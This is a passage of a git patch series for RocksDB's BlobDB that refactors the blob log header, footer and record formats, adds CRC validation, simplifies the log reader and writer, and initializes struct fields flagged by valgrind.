PutFixed64(dst, sn_range_.first); - PutFixed64(dst, sn_range_.second); - - if (has_ts) { - PutFixed64(dst, ts_range_.get()->first); - PutFixed64(dst, ts_range_.get()->second); - } else { - PutFixed64(dst, 0); - PutFixed64(dst, 0); - } 
- - PutFixed32(dst, magic_number_); +void BlobLogFooter::EncodeTo(std::string* dst) { + assert(dst != nullptr); + dst->clear(); + dst->reserve(BlobLogFooter::kSize); + PutFixed32(dst, kMagicNumber); + PutFixed64(dst, blob_count); + PutFixed64(dst, expiration_range.first); + PutFixed64(dst, expiration_range.second); + PutFixed64(dst, sequence_range.first); + PutFixed64(dst, sequence_range.second); + crc = crc32c::Value(dst->c_str(), dst->size()); + crc = crc32c::Mask(crc); + PutFixed32(dst, crc); } -void BlobLogHeader::EncodeTo(std::string* dst) const { - dst->reserve(kHeaderSize); - - PutFixed32(dst, magic_number_); - - PutFixed32(dst, version_); - - RecordSubType st = kRegularType; - bool has_ttl = HasTTL(); - bool has_ts = HasTimestamp(); - - if (has_ttl) { - st = kTTLType; - } else if (has_ts) { - st = kTimestampType; - } - uint32_t val = - static_cast(st) | (static_cast(compression_) << 8); - PutFixed32(dst, val); - - if (has_ttl) { - PutFixed64(dst, ttl_guess_.get()->first); - PutFixed64(dst, ttl_guess_.get()->second); - } else { - PutFixed64(dst, 0); - PutFixed64(dst, 0); +Status BlobLogFooter::DecodeFrom(Slice src) { + static const std::string kErrorMessage = + "Error while decoding blob log footer"; + if (src.size() != BlobLogFooter::kSize) { + return Status::Corruption(kErrorMessage, + "Unexpected blob file footer size"); + } + uint32_t src_crc = 0; + src_crc = crc32c::Value(src.data(), BlobLogFooter::kSize - 4); + src_crc = crc32c::Mask(src_crc); + uint32_t magic_number; + if (!GetFixed32(&src, &magic_number) || !GetFixed64(&src, &blob_count) || + !GetFixed64(&src, &expiration_range.first) || + !GetFixed64(&src, &expiration_range.second) || + !GetFixed64(&src, &sequence_range.first) || + !GetFixed64(&src, &sequence_range.second) || !GetFixed32(&src, &crc)) { + return Status::Corruption(kErrorMessage, "Error decoding content"); + } + if (magic_number != kMagicNumber) { + return Status::Corruption(kErrorMessage, "Magic number mismatch"); + } + if (src_crc != crc) { + return Status::Corruption(kErrorMessage, "CRC mismatch"); } - - if (has_ts) { - PutFixed64(dst, ts_guess_.get()->first); - PutFixed64(dst, ts_guess_.get()->second); - } else { - PutFixed64(dst, 0); - PutFixed64(dst, 0); - } -} - -Status BlobLogHeader::DecodeFrom(const Slice& input) { - Slice slice(input); - if (!GetFixed32(&slice, &magic_number_) || magic_number_ != kMagicNumber) { - return Status::Corruption("Invalid Blob Log Header: magic"); - } - - // as of today, we only support 1 version - if (!GetFixed32(&slice, &version_) || version_ != kVersion1) { - return Status::Corruption("Invalid Blob Log Header: version"); - } - - uint32_t val; - if (!GetFixed32(&slice, &val)) { - return Status::Corruption("Invalid Blob Log Header: subtype"); - } - - bool has_ttl = false; - bool has_ts = false; - RecordSubType st = static_cast(val & 0xff); - compression_ = static_cast((val >> 8) & 0xff); - switch (st) { - case kRegularType: - break; - case kTTLType: - has_ttl = true; - break; - case kTimestampType: - has_ts = true; - break; - default: - return Status::Corruption("Invalid Blob Log Header: subtype_2"); - } - - ttlrange_t temp_ttl; - if (!GetFixed64(&slice, &temp_ttl.first) || - !GetFixed64(&slice, &temp_ttl.second)) { - return Status::Corruption("Invalid Blob Log Header: ttl"); - } - if (has_ttl) { - set_ttl_guess(temp_ttl); - } - - tsrange_t temp_ts; - if (!GetFixed64(&slice, &temp_ts.first) || - !GetFixed64(&slice, &temp_ts.second)) { - return Status::Corruption("Invalid Blob Log Header: timestamp"); - } - if (has_ts) 
set_ts_guess(temp_ts); - return Status::OK(); } -BlobLogRecord::BlobLogRecord() - : checksum_(0), - header_cksum_(0), - key_size_(0), - blob_size_(0), - time_val_(0), - ttl_val_(0), - type_(0), - subtype_(0) {} - -BlobLogRecord::~BlobLogRecord() {} - -void BlobLogRecord::ResizeKeyBuffer(size_t kbs) { - if (kbs > key_buffer_.size()) { - key_buffer_.resize(kbs); - } -} - -void BlobLogRecord::ResizeBlobBuffer(size_t bbs) { - if (bbs > blob_buffer_.size()) { - blob_buffer_.resize(bbs); - } -} - -void BlobLogRecord::Clear() { - checksum_ = 0; - header_cksum_ = 0; - key_size_ = 0; - blob_size_ = 0; - time_val_ = 0; - ttl_val_ = 0; - type_ = subtype_ = 0; - key_.clear(); - blob_.clear(); +void BlobLogRecord::EncodeHeaderTo(std::string* dst) { + assert(dst != nullptr); + dst->clear(); + dst->reserve(BlobLogRecord::kHeaderSize + key.size() + value.size()); + PutFixed64(dst, key.size()); + PutFixed64(dst, value.size()); + PutFixed64(dst, expiration); + header_crc = crc32c::Value(dst->c_str(), dst->size()); + header_crc = crc32c::Mask(header_crc); + PutFixed32(dst, header_crc); + blob_crc = crc32c::Value(key.data(), key.size()); + blob_crc = crc32c::Extend(blob_crc, value.data(), value.size()); + blob_crc = crc32c::Mask(blob_crc); + PutFixed32(dst, blob_crc); } -Status BlobLogRecord::DecodeHeaderFrom(const Slice& hdrslice) { - Slice input = hdrslice; - if (input.size() < kHeaderSize) { - return Status::Corruption("Invalid Blob Record Header: size"); +Status BlobLogRecord::DecodeHeaderFrom(Slice src) { + static const std::string kErrorMessage = "Error while decoding blob record"; + if (src.size() != BlobLogRecord::kHeaderSize) { + return Status::Corruption(kErrorMessage, + "Unexpected blob record header size"); } - - if (!GetFixed32(&input, &key_size_)) { - return Status::Corruption("Invalid Blob Record Header: key_size"); - } - if (!GetFixed64(&input, &blob_size_)) { - return Status::Corruption("Invalid Blob Record Header: blob_size"); + uint32_t src_crc = 0; + src_crc = crc32c::Value(src.data(), BlobLogRecord::kHeaderSize - 8); + src_crc = crc32c::Mask(src_crc); + if (!GetFixed64(&src, &key_size) || !GetFixed64(&src, &value_size) || + !GetFixed64(&src, &expiration) || !GetFixed32(&src, &header_crc) || + !GetFixed32(&src, &blob_crc)) { + return Status::Corruption(kErrorMessage, "Error decoding content"); } - if (!GetFixed64(&input, &ttl_val_)) { - return Status::Corruption("Invalid Blob Record Header: ttl_val"); + if (src_crc != header_crc) { + return Status::Corruption(kErrorMessage, "Header CRC mismatch"); } - if (!GetFixed64(&input, &time_val_)) { - return Status::Corruption("Invalid Blob Record Header: time_val"); - } - - type_ = *(input.data()); - input.remove_prefix(1); - subtype_ = *(input.data()); - input.remove_prefix(1); + return Status::OK(); +} - if (!GetFixed32(&input, &header_cksum_)) { - return Status::Corruption("Invalid Blob Record Header: header_cksum"); +Status BlobLogRecord::CheckBlobCRC() const { + uint32_t expected_crc = 0; + expected_crc = crc32c::Value(key.data(), key.size()); + expected_crc = crc32c::Extend(expected_crc, value.data(), value.size()); + expected_crc = crc32c::Mask(expected_crc); + if (expected_crc != blob_crc) { + return Status::Corruption("Blob CRC mismatch"); } - if (!GetFixed32(&input, &checksum_)) { - return Status::Corruption("Invalid Blob Record Header: checksum"); - } - return Status::OK(); } diff --git a/utilities/blob_db/blob_log_format.h b/utilities/blob_db/blob_log_format.h index c5b96d1b07a..1e056aa50a9 100644 --- 
a/utilities/blob_db/blob_log_format.h +++ b/utilities/blob_db/blob_log_format.h @@ -9,243 +9,113 @@ #ifndef ROCKSDB_LITE -#include -#include #include -#include -#include #include #include "rocksdb/options.h" +#include "rocksdb/slice.h" #include "rocksdb/status.h" #include "rocksdb/types.h" namespace rocksdb { - namespace blob_db { -class BlobFile; -class BlobDBImpl; +constexpr uint32_t kMagicNumber = 2395959; // 0x00248f37 +constexpr uint32_t kVersion1 = 1; constexpr uint64_t kNoExpiration = std::numeric_limits<uint64_t>::max(); -enum RecordType : uint8_t { - // Zero is reserved for preallocated files - kFullType = 0, - - // For fragments - kFirstType = 1, - kMiddleType = 2, - kLastType = 3, - kMaxRecordType = kLastType -}; - -enum RecordSubType : uint8_t { - kRegularType = 0, - kTTLType = 1, - kTimestampType = 2, -}; - -extern const uint32_t kMagicNumber; - -class Reader; - -using ttlrange_t = std::pair<uint64_t, uint64_t>; -using tsrange_t = std::pair<uint64_t, uint64_t>; -using snrange_t = std::pair<SequenceNumber, SequenceNumber>; - -class BlobLogHeader { - friend class BlobFile; - friend class BlobDBImpl; - - private: - uint32_t magic_number_ = 0; - uint32_t version_ = 1; - CompressionType compression_; - std::unique_ptr<ttlrange_t> ttl_guess_; - std::unique_ptr<tsrange_t> ts_guess_; - - private: - void set_ttl_guess(const ttlrange_t& ttl) { - ttl_guess_.reset(new ttlrange_t(ttl)); - } - - void set_version(uint32_t v) { version_ = v; } - - void set_ts_guess(const tsrange_t& ts) { ts_guess_.reset(new tsrange_t(ts)); } - - public: - // magic number + version + flags + ttl guess + timestamp range = 44 - static const size_t kHeaderSize = 4 + 4 + 4 + 8 * 2 + 8 * 2; - - void EncodeTo(std::string* dst) const; - - Status DecodeFrom(const Slice& input); - - BlobLogHeader(); +using ExpirationRange = std::pair<uint64_t, uint64_t>; +using SequenceRange = std::pair<SequenceNumber, SequenceNumber>; - uint32_t magic_number() const { return magic_number_; } - - uint32_t version() const { return version_; } - - CompressionType compression() const { return compression_; } - - ttlrange_t ttl_range() const { - if (!ttl_guess_) { - return {0, 0}; - } - return *ttl_guess_; - } - - tsrange_t ts_range() const { - if (!ts_guess_) { - return {0, 0}; - } - return *ts_guess_; - } +// Format of blob log file header (30 bytes): +// +// +--------------+---------+---------+-------+-------------+-------------------+ +// | magic number | version | cf id | flags | compression | expiration range | +// +--------------+---------+---------+-------+-------------+-------------------+ +// | Fixed32 | Fixed32 | Fixed32 | char | char | Fixed64 Fixed64 | +// +--------------+---------+---------+-------+-------------+-------------------+ +// +// List of flags: +// has_ttl: Whether the file contains TTL data. +// +// Expiration range in the header is a rough range based on +// blob_db_options.ttl_range_secs. +struct BlobLogHeader { + static constexpr size_t kSize = 30; - bool HasTTL() const { return ttl_guess_ != nullptr; } + uint32_t version = kVersion1; + uint32_t column_family_id; + CompressionType compression; + bool has_ttl; + ExpirationRange expiration_range; - bool HasTimestamp() const { return ts_guess_ != nullptr; } + void EncodeTo(std::string* dst); - BlobLogHeader& operator=(BlobLogHeader&& in) noexcept; + Status DecodeFrom(Slice slice); }; -// Footer encapsulates the fixed information stored at the tail -// end of every blob log file. -class BlobLogFooter { - friend class BlobFile; - - public: - // Use this constructor when you plan to write out the footer using - // EncodeTo(). Never use this constructor with DecodeFrom().
- BlobLogFooter(); - - uint32_t magic_number() const { return magic_number_; } - - void EncodeTo(std::string* dst) const; - - Status DecodeFrom(const Slice& input); - - // convert this object to a human readable form - std::string ToString() const; - - // footer size = 4 byte magic number - // 8 bytes count - // 8, 8 - ttl range - // 8, 8 - sn range - // 8, 8 - ts range - // = 64 - static const size_t kFooterSize = 4 + 4 + 8 + (8 * 2) + (8 * 2) + (8 * 2); - - bool HasTTL() const { return !!ttl_range_; } - - bool HasTimestamp() const { return !!ts_range_; } - - uint64_t GetBlobCount() const { return blob_count_; } - - ttlrange_t GetTTLRange() const { - if (ttl_range_) { - *ttl_range_; - } - return {0, 0}; - } - - tsrange_t GetTimeRange() const { - if (ts_range_) { - return *ts_range_; - } - return {0, 0}; - } - - const snrange_t& GetSNRange() const { return sn_range_; } +// Format of blob log file footer (48 bytes): +// +// +--------------+------------+-------------------+-------------------+------------+ +// | magic number | blob count | expiration range | sequence range | footer CRC | +// +--------------+------------+-------------------+-------------------+------------+ +// | Fixed32 | Fixed64 | Fixed64 + Fixed64 | Fixed64 + Fixed64 | Fixed32 | +// +--------------+------------+-------------------+-------------------+------------+ +// +// The footer will be present only when the blob file is properly closed. +// +// Unlike the same field in the file header, the expiration range in the +// footer is the range of the smallest and largest expiration of the data in +// this file. +struct BlobLogFooter { + static constexpr size_t kSize = 48; - private: - uint32_t magic_number_ = 0; - uint64_t blob_count_ = 0; + uint64_t blob_count; + ExpirationRange expiration_range; + SequenceRange sequence_range; + uint32_t crc; - std::unique_ptr ttl_range_; - std::unique_ptr ts_range_; - snrange_t sn_range_; + void EncodeTo(std::string* dst); - private: - void set_ttl_range(const ttlrange_t& ttl) { - ttl_range_.reset(new ttlrange_t(ttl)); - } - void set_time_range(const tsrange_t& ts) { - ts_range_.reset(new tsrange_t(ts)); - } + Status DecodeFrom(Slice slice); }; -extern const size_t kBlockSize; - -class BlobLogRecord { - friend class Reader; - - private: - // this might not be set.
- uint32_t checksum_; - uint32_t header_cksum_; - uint32_t key_size_; - uint64_t blob_size_; - uint64_t time_val_; - uint64_t ttl_val_; - char type_; - char subtype_; - Slice key_; - Slice blob_; - std::string key_buffer_; - std::string blob_buffer_; - - private: - void Clear(); - - char* GetKeyBuffer() { return &(key_buffer_[0]); } - - char* GetBlobBuffer() { return &(blob_buffer_[0]); } - - void ResizeKeyBuffer(size_t kbs); - - void ResizeBlobBuffer(size_t bbs); - - public: - // Header is - // Key Length ( 4 bytes ), - // Blob Length ( 8 bytes), - // ttl (8 bytes), timestamp (8 bytes), - // type (1 byte), subtype (1 byte) - // header checksum (4 bytes), blob checksum (4 bytes), - // = 42 - static const size_t kHeaderSize = 4 + 4 + 8 + 8 + 4 + 8 + 1 + 1; - - public: - BlobLogRecord(); - - ~BlobLogRecord(); - - const Slice& Key() const { return key_; } - - const Slice& Blob() const { return blob_; } - - uint32_t GetKeySize() const { return key_size_; } - - uint64_t GetBlobSize() const { return blob_size_; } - - bool HasTTL() const { - return ttl_val_ != std::numeric_limits::max(); - } - - uint64_t GetTTL() const { return ttl_val_; } - - uint64_t GetTimeVal() const { return time_val_; } - - char type() const { return type_; } - - char subtype() const { return subtype_; } - - uint32_t header_checksum() const { return header_cksum_; } - - uint32_t checksum() const { return checksum_; } - - Status DecodeHeaderFrom(const Slice& hdrslice); +// Blob record format (32 bytes header + key + value): +// +// +------------+--------------+------------+------------+----------+---------+-----------+ +// | key length | value length | expiration | header CRC | blob CRC | key | value | +// +------------+--------------+------------+------------+----------+---------+-----------+ +// | Fixed64 | Fixed64 | Fixed64 | Fixed32 | Fixed32 | key len | value len | +// +------------+--------------+------------+------------+----------+---------+-----------+ +// +// If the file has has_ttl = false, the expiration field is always 0, and the +// blob does not have an expiration. +// +// Also note that if compression is used, value is the compressed value and +// value length is the compressed value length. +// +// Header CRC is the checksum of (key_len + val_len + expiration), while +// blob CRC is the checksum of (key + value). +// +// We could use variable length encoding (Varint64) to save more space, but it +// makes the reader more complicated.
+struct BlobLogRecord { + // header includes fields up to blob CRC + static constexpr size_t kHeaderSize = 32; + + uint64_t key_size; + uint64_t value_size; + uint64_t expiration; + uint32_t header_crc; + uint32_t blob_crc; + Slice key; + Slice value; + std::string key_buf; + std::string value_buf; + + void EncodeHeaderTo(std::string* dst); + + Status DecodeHeaderFrom(Slice src); + + Status CheckBlobCRC() const; }; } // namespace blob_db diff --git a/utilities/blob_db/blob_log_reader.cc b/utilities/blob_db/blob_log_reader.cc index 826551d686e..a2421b93007 100644 --- a/utilities/blob_db/blob_log_reader.cc +++ b/utilities/blob_db/blob_log_reader.cc @@ -7,10 +7,8 @@ #include "utilities/blob_db/blob_log_reader.h" -#include -#include "rocksdb/env.h" -#include "util/coding.h" -#include "util/crc32c.h" +#include + #include "util/file_reader_writer.h" namespace rocksdb { @@ -18,115 +16,79 @@ namespace blob_db { Reader::Reader(std::shared_ptr info_log, unique_ptr&& _file) - : info_log_(info_log), file_(std::move(_file)), buffer_(), next_byte_(0) { - backing_store_.resize(kBlockSize); + : info_log_(info_log), file_(std::move(_file)), buffer_(), next_byte_(0) {} + +Status Reader::ReadSlice(uint64_t size, Slice* slice, std::string* buf) { + buf->reserve(size); + Status s = file_->Read(size, slice, &(*buf)[0]); + next_byte_ += size; + if (!s.ok()) { + return s; + } + if (slice->size() != size) { + return Status::Corruption("EOF reached while reading record"); + } + return s; } -Reader::~Reader() {} - Status Reader::ReadHeader(BlobLogHeader* header) { assert(file_.get() != nullptr); assert(next_byte_ == 0); - Status status = - file_->Read(BlobLogHeader::kHeaderSize, &buffer_, GetReadBuffer()); - next_byte_ += buffer_.size(); - if (!status.ok()) return status; + Status s = ReadSlice(BlobLogHeader::kSize, &buffer_, &backing_store_); + if (!s.ok()) { + return s; + } - if (buffer_.size() != BlobLogHeader::kHeaderSize) { - return Status::IOError("EOF reached before file header"); + if (buffer_.size() != BlobLogHeader::kSize) { + return Status::Corruption("EOF reached before file header"); } - status = header->DecodeFrom(buffer_); - return status; + return header->DecodeFrom(buffer_); } Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, uint64_t* blob_offset) { - record->Clear(); - buffer_.clear(); - backing_store_[0] = '\0'; - - Status status = - file_->Read(BlobLogRecord::kHeaderSize, &buffer_, GetReadBuffer()); - next_byte_ += buffer_.size(); - if (!status.ok()) return status; + Status s = ReadSlice(BlobLogRecord::kHeaderSize, &buffer_, &backing_store_); + if (!s.ok()) { + return s; + } if (buffer_.size() != BlobLogRecord::kHeaderSize) { - return Status::IOError("EOF reached before record header"); + return Status::Corruption("EOF reached before record header"); } - status = record->DecodeHeaderFrom(buffer_); - if (!status.ok()) { - return status; + s = record->DecodeHeaderFrom(buffer_); + if (!s.ok()) { + return s; } - uint32_t header_crc = 0; - uint32_t blob_crc = 0; - size_t crc_data_size = BlobLogRecord::kHeaderSize - 2 * sizeof(uint32_t); - header_crc = crc32c::Extend(header_crc, buffer_.data(), crc_data_size); - - uint64_t kb_size = record->GetKeySize() + record->GetBlobSize(); + uint64_t kb_size = record->key_size + record->value_size; if (blob_offset != nullptr) { - *blob_offset = next_byte_ + record->GetKeySize(); + *blob_offset = next_byte_ + record->key_size; } + switch (level) { case kReadHeader: - file_->Skip(kb_size); + file_->Skip(record->key_size + record->value_size);
next_byte_ += kb_size; + break; case kReadHeaderKey: - record->ResizeKeyBuffer(record->GetKeySize()); - status = file_->Read(record->GetKeySize(), &record->key_, - record->GetKeyBuffer()); - next_byte_ += record->key_.size(); - if (!status.ok()) return status; - if (record->key_.size() != record->GetKeySize()) { - return Status::IOError("EOF reached before key read"); - } - - header_crc = - crc32c::Extend(header_crc, record->key_.data(), record->GetKeySize()); - header_crc = crc32c::Mask(header_crc); - if (header_crc != record->header_cksum_) { - return Status::Corruption("Record Checksum mismatch: header_cksum"); - } - - file_->Skip(record->GetBlobSize()); - next_byte_ += record->GetBlobSize(); + s = ReadSlice(record->key_size, &record->key, &record->key_buf); + file_->Skip(record->value_size); + next_byte_ += record->value_size; + break; case kReadHeaderKeyBlob: - record->ResizeKeyBuffer(record->GetKeySize()); - status = file_->Read(record->GetKeySize(), &record->key_, - record->GetKeyBuffer()); - next_byte_ += record->key_.size(); - if (!status.ok()) return status; - if (record->key_.size() != record->GetKeySize()) { - return Status::IOError("EOF reached before key read"); - } - - header_crc = - crc32c::Extend(header_crc, record->key_.data(), record->GetKeySize()); - header_crc = crc32c::Mask(header_crc); - if (header_crc != record->header_cksum_) { - return Status::Corruption("Record Checksum mismatch: header_cksum"); - } - - record->ResizeBlobBuffer(record->GetBlobSize()); - status = file_->Read(record->GetBlobSize(), &record->blob_, - record->GetBlobBuffer()); - next_byte_ += record->blob_.size(); - if (!status.ok()) return status; - if (record->blob_.size() != record->GetBlobSize()) { - return Status::IOError("EOF reached during blob read"); + s = ReadSlice(record->key_size, &record->key, &record->key_buf); + if (s.ok()) { + s = ReadSlice(record->value_size, &record->value, &record->value_buf); } - - blob_crc = - crc32c::Extend(blob_crc, record->blob_.data(), record->blob_.size()); - blob_crc = crc32c::Mask(blob_crc); - if (blob_crc != record->checksum_) { - return Status::Corruption("Blob Checksum mismatch"); + if (s.ok()) { + s = record->CheckBlobCRC(); } + break; } - return status; + return s; } } // namespace blob_db diff --git a/utilities/blob_db/blob_log_reader.h b/utilities/blob_db/blob_log_reader.h index d37e10bc4e4..9c76b92aefe 100644 --- a/utilities/blob_db/blob_log_reader.h +++ b/utilities/blob_db/blob_log_reader.h @@ -7,11 +7,9 @@ #ifndef ROCKSDB_LITE -#include #include #include -#include "rocksdb/options.h" #include "rocksdb/slice.h" #include "rocksdb/status.h" #include "utilities/blob_db/blob_log_format.h" @@ -51,7 +49,11 @@ class Reader { Reader(std::shared_ptr info_log, std::unique_ptr&& file); - ~Reader(); + ~Reader() = default; + + // No copying allowed + Reader(const Reader&) = delete; + Reader& operator=(const Reader&) = delete; Status ReadHeader(BlobLogHeader* header); @@ -64,6 +66,8 @@ class Reader { Status ReadRecord(BlobLogRecord* record, ReadLevel level = kReadHeader, uint64_t* blob_offset = nullptr); + Status ReadSlice(uint64_t size, Slice* slice, std::string* buf); + SequentialFileReader* file() { return file_.get(); } void ResetNextByte() { next_byte_ = 0; } @@ -72,9 +76,6 @@ class Reader { const SequentialFileReader* file_reader() const { return file_.get(); } - private: - char* GetReadBuffer() { return &(backing_store_[0]); } - private: std::shared_ptr info_log_; const std::unique_ptr file_; @@ -84,10 +85,6 @@ class Reader { // which byte to read next. 
For asserting proper usage uint64_t next_byte_; - - // No copying allowed - Reader(const Reader&) = delete; - Reader& operator=(const Reader&) = delete; }; } // namespace blob_db diff --git a/utilities/blob_db/blob_log_writer.cc b/utilities/blob_db/blob_log_writer.cc index f4fcaeb90f9..806ca3c959f 100644 --- a/utilities/blob_db/blob_log_writer.cc +++ b/utilities/blob_db/blob_log_writer.cc @@ -10,8 +10,8 @@ #include #include "rocksdb/env.h" #include "util/coding.h" -#include "util/crc32c.h" #include "util/file_reader_writer.h" +#include "utilities/blob_db/blob_log_format.h" namespace rocksdb { namespace blob_db { @@ -24,18 +24,11 @@ Writer::Writer(unique_ptr&& dest, uint64_t log_number, bytes_per_sync_(bpsync), next_sync_offset_(0), use_fsync_(use_fs), - last_elem_type_(kEtNone) { - for (int i = 0; i <= kMaxRecordType; i++) { - char t = static_cast(i); - type_crc_[i] = crc32c::Value(&t, 1); - } -} - -Writer::~Writer() {} + last_elem_type_(kEtNone) {} void Writer::Sync() { dest_->Sync(use_fsync_); } -Status Writer::WriteHeader(const BlobLogHeader& header) { +Status Writer::WriteHeader(BlobLogHeader& header) { assert(block_offset_ == 0); assert(last_elem_type_ == kEtNone); std::string str; @@ -50,7 +43,7 @@ Status Writer::WriteHeader(const BlobLogHeader& header) { return s; } -Status Writer::AppendFooter(const BlobLogFooter& footer) { +Status Writer::AppendFooter(BlobLogFooter& footer) { assert(block_offset_ != 0); assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord); @@ -69,13 +62,13 @@ Status Writer::AppendFooter(const BlobLogFooter& footer) { } Status Writer::AddRecord(const Slice& key, const Slice& val, - uint64_t* key_offset, uint64_t* blob_offset, - uint64_t ttl) { + uint64_t expiration, uint64_t* key_offset, + uint64_t* blob_offset) { assert(block_offset_ != 0); assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord); std::string buf; - ConstructBlobHeader(&buf, key, val, ttl, -1); + ConstructBlobHeader(&buf, key, val, expiration); Status s = EmitPhysicalRecord(buf, key, val, key_offset, blob_offset); return s; @@ -87,44 +80,19 @@ Status Writer::AddRecord(const Slice& key, const Slice& val, assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord); std::string buf; - ConstructBlobHeader(&buf, key, val, -1, -1); + ConstructBlobHeader(&buf, key, val, 0); Status s = EmitPhysicalRecord(buf, key, val, key_offset, blob_offset); return s; } -void Writer::ConstructBlobHeader(std::string* headerbuf, const Slice& key, - const Slice& val, uint64_t ttl, int64_t ts) { - headerbuf->reserve(BlobLogRecord::kHeaderSize); - - uint32_t key_size = static_cast(key.size()); - PutFixed32(headerbuf, key_size); - PutFixed64(headerbuf, val.size()); - - PutFixed64(headerbuf, ttl); - PutFixed64(headerbuf, ts); - - RecordType t = kFullType; - headerbuf->push_back(static_cast(t)); - - RecordSubType st = kRegularType; - if (ttl != kNoExpiration) { - st = kTTLType; - } - headerbuf->push_back(static_cast(st)); - - uint32_t header_crc = 0; - header_crc = - crc32c::Extend(header_crc, headerbuf->c_str(), headerbuf->size()); - header_crc = crc32c::Extend(header_crc, key.data(), key.size()); - header_crc = crc32c::Mask(header_crc); - PutFixed32(headerbuf, header_crc); - - uint32_t crc = 0; - // Compute the crc of the record type and the payload. 
- crc = crc32c::Extend(crc, val.data(), val.size()); - crc = crc32c::Mask(crc); // Adjust for storage - PutFixed32(headerbuf, crc); +void Writer::ConstructBlobHeader(std::string* buf, const Slice& key, + const Slice& val, uint64_t expiration) { + BlobLogRecord record; + record.key = key; + record.value = val; + record.expiration = expiration; + record.EncodeHeaderTo(buf); } Status Writer::EmitPhysicalRecord(const std::string& headerbuf, diff --git a/utilities/blob_db/blob_log_writer.h b/utilities/blob_db/blob_log_writer.h index d674351588b..2a1f05e1b34 100644 --- a/utilities/blob_db/blob_log_writer.h +++ b/utilities/blob_db/blob_log_writer.h @@ -37,24 +37,29 @@ class Writer { explicit Writer(std::unique_ptr&& dest, uint64_t log_number, uint64_t bpsync, bool use_fsync, uint64_t boffset = 0); - ~Writer(); - static void ConstructBlobHeader(std::string* headerbuf, const Slice& key, - const Slice& val, uint64_t ttl, int64_t ts); + ~Writer() = default; + + // No copying allowed + Writer(const Writer&) = delete; + Writer& operator=(const Writer&) = delete; + + static void ConstructBlobHeader(std::string* buf, const Slice& key, + const Slice& val, uint64_t expiration); Status AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, uint64_t* blob_offset); - Status AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, - uint64_t* blob_offset, uint64_t ttl); + Status AddRecord(const Slice& key, const Slice& val, uint64_t expiration, + uint64_t* key_offset, uint64_t* blob_offset); Status EmitPhysicalRecord(const std::string& headerbuf, const Slice& key, const Slice& val, uint64_t* key_offset, uint64_t* blob_offset); - Status AppendFooter(const BlobLogFooter& footer); + Status AppendFooter(BlobLogFooter& footer); - Status WriteHeader(const BlobLogHeader& header); + Status WriteHeader(BlobLogHeader& header); WritableFileWriter* file() { return dest_.get(); } @@ -76,15 +81,6 @@ class Writer { uint64_t next_sync_offset_; bool use_fsync_; - // crc32c values for all supported record types. These are - // pre-computed to reduce the overhead of computing the crc of the - // record type stored in the header. - uint32_t type_crc_[kMaxRecordType + 1]; - - // No copying allowed - Writer(const Writer&) = delete; - Writer& operator=(const Writer&) = delete; - public: enum ElemType { kEtNone, kEtFileHdr, kEtRecord, kEtFileFooter }; ElemType last_elem_type_; From ffc3c62ca2947203778a954259c9ffb9de1abd07 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Tue, 31 Oct 2017 16:27:22 -0700 Subject: [PATCH 180/205] Blob DB: Initialize all fields in Blob Header, Footer and Record structs Summary: Fixing uninitialized fields caught by valgrind.
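These structs are POD-style aggregates, so a default-constructed header or footer carried indeterminate bytes into EncodeTo(). A minimal sketch of the failure mode and the in-class default member initializer fix, using a hypothetical Header type rather than the actual BlobDB structs:

    #include <cstdint>
    #include <string>

    struct Header {
      // Without "= 0" / "= false", a default-constructed Header holds
      // indeterminate values, and serializing it trips valgrind's
      // "use of uninitialised value" check.
      uint32_t column_family_id = 0;
      bool has_ttl = false;
    };

    std::string Encode(const Header& h) {
      std::string dst;
      dst.append(reinterpret_cast<const char*>(&h.column_family_id),
                 sizeof(h.column_family_id));
      dst.push_back(h.has_ttl ? 1 : 0);
      return dst;
    }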
Closes https://github.com/facebook/rocksdb/pull/3103 Differential Revision: D6200195 Pulled By: sagar0 fbshipit-source-id: bf35a3fb03eb1d308e4c5ce30dee1e345d7b03b3 --- utilities/blob_db/blob_db_impl.cc | 5 +++++ utilities/blob_db/blob_log_format.h | 26 +++++++++++++------------- 2 files changed, 18 insertions(+), 13 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 701066f80ff..8f4b876842e 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -552,6 +552,8 @@ std::shared_ptr BlobDBImpl::SelectBlobFile() { bfile->file_size_ = BlobLogHeader::kSize; bfile->header_.compression = bdb_options_.compression; bfile->header_.has_ttl = false; + bfile->header_.column_family_id = + reinterpret_cast(DefaultColumnFamily())->GetID(); bfile->header_valid_ = true; bfile->SetHasTTL(false); @@ -615,6 +617,9 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { bfile->header_.expiration_range = expiration_range; bfile->header_.compression = bdb_options_.compression; bfile->header_.has_ttl = true; + bfile->header_.column_family_id = + reinterpret_cast(DefaultColumnFamily())->GetID(); + ; bfile->header_valid_ = true; bfile->SetHasTTL(true); bfile->file_size_ = BlobLogHeader::kSize; diff --git a/utilities/blob_db/blob_log_format.h b/utilities/blob_db/blob_log_format.h index 1e056aa50a9..0b5cff54797 100644 --- a/utilities/blob_db/blob_log_format.h +++ b/utilities/blob_db/blob_log_format.h @@ -43,10 +43,10 @@ struct BlobLogHeader { static constexpr size_t kSize = 30; uint32_t version = kVersion1; - uint32_t column_family_id; - CompressionType compression; - bool has_ttl; - ExpirationRange expiration_range; + uint32_t column_family_id = 0; + CompressionType compression = kNoCompression; + bool has_ttl = false; + ExpirationRange expiration_range = std::make_pair(0, 0); void EncodeTo(std::string* dst); @@ -68,10 +68,10 @@ struct BlobLogFooter { static constexpr size_t kSize = 48; - uint64_t blob_count; - ExpirationRange expiration_range; - SequenceRange sequence_range; - uint32_t crc; + uint64_t blob_count = 0; + ExpirationRange expiration_range = std::make_pair(0, 0); + SequenceRange sequence_range = std::make_pair(0, 0); + uint32_t crc = 0; void EncodeTo(std::string* dst); @@ -101,11 +101,11 @@ struct BlobLogRecord { // header include fields up to blob CRC static constexpr size_t kHeaderSize = 32; - uint64_t key_size; - uint64_t value_size; - uint64_t expiration; - uint32_t header_crc; - uint32_t blob_crc; + uint64_t key_size = 0; + uint64_t value_size = 0; + uint64_t expiration = 